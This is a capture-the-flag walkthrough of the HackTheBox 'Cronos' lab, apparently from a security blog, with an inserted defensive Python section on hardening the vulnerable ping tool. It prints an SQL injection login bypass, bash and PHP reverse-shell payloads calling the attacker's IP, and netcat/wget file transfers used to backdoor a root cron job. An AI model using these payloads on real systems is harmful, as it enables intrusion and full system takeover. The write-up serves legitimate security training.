SecWalk.com

HTB Walkthrough Cronos 10.10.10.13

Box summary:

Cronos was released in 2017 and is rated medium.

By scanning the machine we found that DNS is running on the system. By querying the DNS server we discovered a subdomain, admin.cronos.htb. The login page on that subdomain is vulnerable to a SQL injection bypass. After bypassing the login page, we found a ping tool that is vulnerable to command execution, which gave us user-level access to the system. To expand that to root-level access, we exploited a cron job.

Enumeration

Nmap

nmap -sV -sC 10.10.10.13

Domain enumeration

I saw that port 53 (DNS) is open, so I tried a zone transfer to enumerate the DNS records.

dig axfr @10.10.10.13 cronos.htb

I added admin.cronos.htb to /etc/hosts file.

Web Page Enumeration

We see a login page.

I tried a basic SQL injection login bypass and it succeeded.

' or 1=1-- -


Exploitation

After we successfully log in, we see the following page.

I started Burp Suite, and intercepted the request.

Basic Command Execution

I tried to ping my own machine first, to confirm that we really have command execution.

Before executing it, I started tcpdump to catch the ICMP packets.

tcpdump -i tun0 icmp

Getting Reverse Shell

Now that our command execution is confirmed, we can change the ping payload to a reverse shell payload.

bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.4/1234+0>%261'%26

Now we have a reverse shell.
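The ping tool on this box is exploitable because the target field is concatenated into a shell command. The following is an added example (not code from the box or from the original post) that shows the hardened form of such a wrapper in Python, plus a small log check that flags the URL-encoded metacharacters used above. The function names and the sample parameters are constructed for this illustration.

```python
import ipaddress
import re
import subprocess
from urllib.parse import unquote_plus

# Hostname labels: letters, digits and hyphens only, so no shell metacharacters can pass.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_command(value: str) -> str:
    """The injectable pattern (string concatenation into a shell line). Shown, not run."""
    return "ping -c 1 " + value


def validate_target(value: str) -> str:
    """Return value if it is a plain IP address or hostname, otherwise raise ValueError."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if _HOSTNAME_RE.match(value):
        return value
    raise ValueError(f"rejected ping target: {value!r}")


def ping_argv(value: str) -> list:
    """Hardened form: validated target, passed as one argv element, never through a shell."""
    return ["ping", "-c", "1", validate_target(value)]


def ping(value: str) -> int:
    # No shell=True: the list form hands the target to ping as a single argument,
    # so '&', ';' or '|' in the input can never start a second command.
    return subprocess.run(ping_argv(value), capture_output=True).returncode


def looks_injected(raw_param: str) -> bool:
    """Detection helper for access logs or a WAF rule: decode the URL-encoded
    parameter and flag shell metacharacters that a legitimate host never contains."""
    decoded = unquote_plus(raw_param)
    return re.search(r"[;&|`$<>\n]", decoded) is not None


# Constructed sample request parameters: one benign, one of the shape used above.
SAMPLE_PARAMS = ["10.10.14.4", "bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.4/1234+0>%261'%26"]
```

Running `[looks_injected(p) for p in SAMPLE_PARAMS]` gives `[False, True]`, and `ping_argv` raises on anything that is not a bare IP or hostname.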



Post-Exploitation

By basic enumeration, I found an interesting crontab.


File Transfer with Netcat

Looking at the directory, I can modify one file (artisan). Putting a reverse shell in it will give us a root shell back when the cron job runs it.

First, I downloaded the file to my system in order to modify it.

On Target System: nc -nv 10.10.14.4 1234 < artisan

On My Own System: nc -lnvp 1234 > artisan


Modify Artisan File

I added the following 2 lines to the file:

$sock=fsockopen("10.10.14.4", 1234);

exec("/bin/sh -i <&3 >&3 2>&3");

After this I transferred the file back to the target system and overwrote the current artisan file.

On Target System: wget http://10.10.14.4:8000/artisan

On Kali System: python3 -m http.server


Root Shell

Now we have a root shell.

whoami && ifconfig && cat root.txt; echo

Made by: IceL0rd

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.
